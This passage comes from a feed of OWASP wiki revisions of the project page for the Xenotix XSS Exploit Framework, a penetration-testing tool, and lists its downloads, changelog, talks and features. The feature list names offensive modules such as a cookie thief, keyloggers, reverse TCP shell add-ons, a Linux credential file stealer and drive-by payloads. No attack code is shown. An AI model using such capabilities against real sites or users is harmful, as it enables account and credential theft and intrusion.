*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
==V6.1 Changes==&lt;br /&gt;
* Bug Fixes&lt;br /&gt;
* Updated QuickPHP Server&lt;br /&gt;
* Local DOM XSS Analyzer&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]	&lt;br /&gt;
&lt;br /&gt;
= Goodies =		&lt;br /&gt;
== Xenotix Hoodies ==&lt;br /&gt;
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:ToolsWatch2014.png&amp;diff=188145</id>
		<title>File:ToolsWatch2014.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:ToolsWatch2014.png&amp;diff=188145"/>
				<updated>2015-01-15T05:03:32Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=188144</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=188144"/>
				<updated>2015-01-15T05:02:40Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: /* AWARDS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
== PROJECT WEBSITE ==&lt;br /&gt;
&lt;br /&gt;
*http://xenotix.in&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:ToolsWatch2014.png |180px | thumb | left |link=http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2014]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Jan 2015] [http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2014, voted by ToolsWatch Readers]&lt;br /&gt;
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
**DOM XSS Analyzer&lt;br /&gt;
**Local DOM XSS Analyzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]&lt;br /&gt;
MD5: 17c703f90dbb4f09b112284232bbb69f&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
==V6.1 Changes==&lt;br /&gt;
* Bug Fixes&lt;br /&gt;
* Updated QuickPHP Server&lt;br /&gt;
* Local DOM XSS Analyzer&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]	&lt;br /&gt;
&lt;br /&gt;
= Goodies =		&lt;br /&gt;
== Xenotix Hoodies ==&lt;br /&gt;
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=188143</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=188143"/>
				<updated>2015-01-15T05:00:41Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: awards added&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
